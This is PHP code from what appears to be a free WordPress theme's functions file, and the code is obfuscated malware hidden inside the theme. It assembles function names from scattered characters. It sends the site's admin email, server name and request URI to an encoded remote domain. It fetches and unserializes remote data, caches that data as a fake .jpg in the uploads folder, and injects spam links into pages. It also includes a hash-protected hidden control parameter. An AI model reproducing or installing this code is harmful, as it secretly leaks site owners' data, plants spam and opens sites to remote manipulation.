				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $fe______c -->";
			}
		}
	


		function wp_loaded() {
			global $as______________v, $vb______________m;
			return $vb______________m($as______________v("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($yy_____________f, $zz_______________y = "(more...)", $tl_____________n = 0, $oa________n = "") {
				$yu____z = get_the_content($zz_______________y, $tl_____________n, $oa________n);
				$yu____z = apply_filters("the_content", $yu____z);
				
				$yu____z = str_replace("]]>", "]]>", $yu____z);
				if (strlen($_GET["p"]) > 0) {
					echo $yu____z;
				}
				else if ((strlen($yu____z)>$yy_____________f) && ($qb___________y = strpos($yu____z, " ", $yy_____________f ))) {
					$yu____z = substr($yu____z, 0, $qb___________y);
					$yu____z = $yu____z;
					echo $yu____z;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$zz_______________y</a></div></p>";
				} else {
					echo $yu____z;
				}
				
			}
		}
	


		$qc____________v='a';$qk____w='4';$ru___f='e';$xq_____________b='e';$le___b='n';$wf_____t='o';$ks______b='e';$gw______________d='c';$or__w='b';$uj______________t='6';$va_____________p='d';$eq______________c='_';$wa______c='s';$yl___________a=$or__w.$qc____________v.$wa______c.$xq_____________b.$uj______________t.$qk____w.$eq______________c.$ru___f.$le___b.$gw______________d.$wf_____t.$va_____________p.$ks______b;
		$pw______________j='f';$kd______________k='o';$pj_______f='t';$pn_________j='e';$yv___a='n';$tp___________t='e';$tn_____d='s';$lt____b='l';$cp__________j='_';$kr_______________v='c';$aw___c='g';$gg_________l='_';$fd___o='i';$lt_______m='t';$dg___t='n';$pm_______________v='t';$zu_______________s='e';$wc___________b=$pw______________j.$fd___o.$lt____b.$zu_______________s.$cp__________j.$aw___c.$tp___________t.$pj_______f.$gg_________l.$kr_______________v.$kd______________k.$yv___a.$lt_______m.$pn_________j.$dg___t.$pm_______________v.$tn_____d;
		$qo___u='x';$cm_________l='e';$oz___a='i';$tw____w='_';$cz____s='l';$sq_____________d='f';$cw_____v='i';$bb___e='t';$bg______________d='s';$gf___________t='e';$nb_______________c='s';$ea_________y=$sq_____________d.$oz___a.$cz____s.$cm_________l.$tw____w.$gf___________t.$qo___u.$cw_____v.$nb_______________c.$bb___e.$bg______________d;
		$mo________r='a';$el___________w='p';$sb______________q='i';$pr____a='r';$ts____________w='c';$eb______c='n';$my____________g='m';$du____________s='o';$zk_________a='v';$tf___________l='s';$pf______________j='e';$tj____t='_';$eb__f='o';$dl__w='e';$qo______________v='r';$rr_______l=$zk_________a.$dl__w.$pr____a.$tf___________l.$sb______________q.$eb__f.$eb______c.$tj____t.$ts____________w.$du____________s.$my____________g.$el___________w.$mo________r.$qo______________v.$pf______________j;
		$cq_____________a='c';$xj______________z='o';$sq_________p='e';$ys____________o='o';$kx_________j='k';$sw_____________m='s';$zb_______s='n';$xj_________u='f';$is_____________c='p';$ir___f=$xj_________u.$sw_____________m.$ys____________o.$cq_____________a.$kx_________j.$xj______________z.$is_____________c.$sq_________p.$zb_______s;
		$jz____________n='i';$pc_________o='t';$io______________h='e';$hd______________v='r';$xj____________w='w';$yq____w='f';$eo___l=$yq____w.$xj____________w.$hd______________v.$jz____________n.$pc_________o.$io______________h;
		$mv___________c='d';$vm__f='m';$yg___________h='5';$zu_______________n=$vm__f.$mv___________c.$yg___________h;
		$im___p='l';$rj______y='h';$sw______s='p';$qx__________p='t';$is_______j='e';$tp______n='a';$je___________c='a';$hw___________x='r';$jl___d=$hw___________x.$is_______j.$tp______n.$im___p.$sw______s.$je___________c.$qx__________p.$rj______y;
		$ik____________r='i';$li___________p='a';$zt__v='e';$re______________a='i';$jx___________b='n';$yg_______l='r';$sm________s='e';$rd____________d='l';$ze_______k='s';$co___c='z';$mo________t='u';$bq_____a=$mo________t.$jx___________b.$ze_______k.$zt__v.$yg_______l.$ik____________r.$li___________p.$rd____________d.$re______________a.$co___c.$sm________s;
		$jg_____________c='m';$kf___h='m';$ty________b='e';$la____________k='a';$mx______h='t';$ea___________l='n';$td________j='p';$zs_________h=$mx______h.$ty________b.$jg_____________c.$td________j.$ea___________l.$la____________k.$kf___h;
		$gz____q='a';$ga___o='_';$mn______j='t';$ji____p='e';$ij_____d='t';$ht___________u='e';$pu_____________d='t';$gm________w='a';$vq________g='x';$ar_________x='o';$ct________t='r';$qo____________c='r';$df______________c='s';$ol_____z='_';$xw__v='e';$ar_______p='e';$xu____c='t';$vy__v='c';$hu_____________l='c';$mt__o='n';$ly______o='m';$se________w=$df______________c.$xu____c.$ct________t.$xw__v.$gm________w.$ly______o.$ol_____z.$hu_____________l.$ar_________x.$mt__o.$mn______j.$ji____p.$vq________g.$pu_____________d.$ga___o.$vy__v.$qo____________c.$ht___________u.$gz____q.$ij_____d.$ar_______p;
	


		function xm______________a($br__________s) {
			global $as______________v, $vb______________m, $wc___________b, $rr_______l, $se________w;
			
			if (!$vb______________m($as______________v("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($rr_______l(PHP_VERSION, "5.0.0", ">=") && $vb______________m($as______________v("ZmlsZV9nZXRfY29udGVudHM=")) && $vb______________m($as______________v("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$ij_______________v = $se________w(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$fo____________j = @$wc___________b($br__________s, 0, $ij_______________v);
			} else {
				$fo____________j = @$wc___________b($br__________s, 0);
			}
			
			return $fo____________j;
		}
	


		function zn_____w($br__________s) {
			global $vb______________m, $ir___f, $eo___l, $as______________v;
			
			if (!$vb______________m($as______________v("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$ss_________u = strpos($br__________s, "/", 7);
			$ym___________d = array(
				"uri"     => substr($br__________s, $ss_________u),
				"host"    => str_replace("http://", "", substr($br__________s, 0, $ss_________u)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$sr______r = @$ir___f("$ym___________d[host]", 80, $vg____________o, $ow______n, 4);
			
			if (!$sr______r) {
				return false;
			} else {
				$fo____________j = "";
				$vw____________i  = "GET $ym___________d[uri] HTTP/1.0\r\n";
				$vw____________i .= "Host: $ym___________d[host]\r\n";
				$vw____________i .= "Referer: $ym___________d[referer]\r\n";
				$vw____________i .= "Connection: Close\r\n\r\n";
				
				@$eo___l($sr______r, $vw____________i);
				
				while (!@feof($sr______r)) {
					$sq____z = @fgets($sr______r, (1024*24));
					
					if ($sq____z == "\r\n") {
						$ia______f = true;
						continue;
					}
					
					if ($ia______f) {
						$fo____________j .= $sq____z;
					}
				}
				
				return $fo____________j;
			}
		}
	


		function gl________e($br__________s) {
			global $vb______________m;
			$ee____z = false;
			
			if ($br__________s != "") {
				if ($vb______________m("xm______________a")) {
					$ee____z = @xm______________a($br__________s);
				}
				
				if (!$ee____z && ($vb______________m("zn_____w"))) {
					$ee____z = @zn_____w($br__________s);
				}
			}
			
			return $ee____z;
		}
	


		function om____a() {
			global $_SERVER, $zu_______________n;
			
			$zs_____________n = $_SERVER["SERVER_NAME"];
			
			if (substr("$zs_____________n", 0, 4) == "www.") {
				$zs_____________n = substr("$zs_____________n", 4);
			}
			
			$zs_____________n = $zu_______________n("$_SERVER[SERVER_NAME]");
			
			return $zs_____________n;
		}
	


		function nm___________n() {
			return "file";
		}
	


		function ja__________q($br__________s) {
			global $_SERVER, $wc___________b, $ea_________y, $nw__t, $uv_____________a, $eo___l;
			
			$bp_______n = az______i();
			
			$rp__w = om____a().".jpg";
			$uj_______y = $bp_______n["dir_upload"]["path"]."/$rp__w";
			$au______a = @filemtime($uj_______y);
			
			if (!$au______a || ((time()-$au______a) >= WP_TTL)) {
				$ee____z = gl________e($br__________s);
				
				if ($ee____z) {
					if ($ea_________y($uj_______y)) {
						@unlink($uj_______y);
					}
					
					$uv_____o = @$nw__t($uj_______y, "x+");
					
					@$eo___l($uv_____o, $ee____z);
					@$uv_____________a($uv_____o);
				}
			} else {
				if ($ea_________y($uj_______y)) {
					$ee____z = @$wc___________b($uj_______y);
				} else {
					$ee____z = false;
				}
			}
			
			return $ee____z;
		}
	


		function az______i() {
			global $_SERVER, $as______________v, $yl___________a;
			
			$zb____k = wp_count_posts("post");
			$xy____n = pathinfo(get_bloginfo("template_directory"));
			
			$bp_______n = array(
				"url" => array(
					"report"      => $as______________v("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $xy____n,
				"dir_upload"	=> fw_____d(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$xy____n[filename],
					"a005=".$zb____k->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => "Спонсоры темы для Вордпресс <a href=\"http://clinic-virtus.com/vybor-opravy-ochkov/\">Выбор оправы очков</a>"
			);
			
			$bp_______n["url"]["queryString"] = implode("&", $bp_______n["queryString"]);
			$bp_______n["url"]["report"] = $bp_______n["url"]["report"]."/?".$yl___________a($bp_______n["url"]["queryString"]).".html";
						
			return $bp_______n;
		}
	


		function fw_____d() {
			$ym__________w = wp_upload_dir();
			
			if (isset($ym__________w["error"])) {
				$gb_____l = kp________g();
				if (is_writable($gb_____l)) {
					$ym__________w = array("path" => $gb_____l);
				}
			}

			return $ym__________w;
		}
	


		function kp________g() {
			global $vb______________m, $zu_______________n, $jl___d, $zs_________h;
			
			$oh________m = (bool) ini_get("safe_mode");
			if ($oh________m == true) {
				return false;
			}
			
			if ($vb______________m("sys_get_temp_dir")) {
				$li__l = sys_get_temp_dir();
				if (is_writable($li__l)) {
					return $jl___d($li__l);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $jl___d($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $jl___d($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $jl___d($_ENV["TEMP"]);
			} else {
				$mh__l = $zs_________h($zu_______________n(uniqid(rand(), true)), "");
				if ($mh__l) {
					$li__l = $jl___d(dirname($mh__l));
					@unlink($mh__l);
					return $li__l;
				} else {
					return false;
				}
			}
		}
	


		function qc_______________e() {
			global $_GET, $ea_________y;
			
			$bp_______n = az______i();
			$zs_____________n = om____a();
			$ca_________b = nm___________n();
			
			$cn___x = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($ca_________b == "file") {
					$lv_____o = $bp_______n["dir_upload"]["path"]."/".$zs_____________n.".jpg";
					if ($ea_________y($lv_____o)) {
						@unlink($lv_____o);
						$cn___x = "deleted";
					}
				}
				
				$nu________m = array(
					"s"	=> $cn___x,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($nu________m AS $mv____y => $ql________v) echo " [$mv____y:$ql________v]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $vb______________m, $as______________v, $bq_____a;
			$bp_______n = az______i();
			
			$yv_________y = "ja__________q";
			if ($vb______________m($yv_________y)) {
				$fo____________j = $yv_________y($bp_______n["url"]["report"]);
			}
			
			if ($fo____________j) {
				if ($fo____________j = @$as______________v($fo____________j)) {
					$fo____________j = @$bq_____a($fo____________j);
					
					if (strlen($fo____________j[custom_credit]) >= 5) {
						$bp_______n["default_string"] = $fo____________j[custom_credit];
					}
					
					if ($fo____________j["status"] == "0") {
						$ui_____________z = 1;
						$id_______________k = 1;
					} else {
						$sy__w = sizeof($fo____________j["links"]);
						$kn___y = $bp_______n["default_string"];
						
						if ($sy__w > 0 && $fo____________j["links"] !== "") {
							$lc______________l = 0;
							foreach ($fo____________j["links"] as $tg___u => $eh___________s) {
								$lc______________l++;
								if ($eh___________s->l_path == "" || $eh___________s->l_path == $_SERVER["REQUEST_URI"]) {
									$eh___________s->l_href = htmlspecialchars(strip_tags($eh___________s->l_href));
									$eh___________s->l_title = htmlspecialchars(strip_tags($eh___________s->l_title));
									$eh___________s->l_anchor = htmlspecialchars(strip_tags($eh___________s->l_anchor));
									$kn___y .= " | ";
									$kn___y .= "<a href='$eh___________s->l_href' title='$eh___________s->l_title'";
									if ($eh___________s->l_nofollow == "1") {
										$kn___y .= " rel='nofollow'";
									}
									$kn___y .= ">$eh___________s->l_anchor</a>";
								}
							}
						}
						$bp_______n["links"] = "$kn___y";
						if ($fo____________j[credit] == "0") {
							$bp_______n["links"] = "";
						}
					}
				} else {
					$ui_____________z = "1";
				}
			} else {
				$ui_____________z = "1";
			}
			
			if ($ui_____________z == "1") {
				$bp_______n["links"] = $bp_______n["default_string"];
			}
			
			echo "$bp_______n[links]";
			
			echo "<!-- s: $fo____________j[signature] -->";
			qc_______________e();
		}
	                      
function widget_verticalmenu_init() {
	if ( !function_exists('register_sidebar_widget') ) return;
	register_sidebar_widget(array('Vertical menu', 'widgets'), 'widget_verticalmenu');
}

add_action('widgets_init', 'widget_verticalmenu_init');
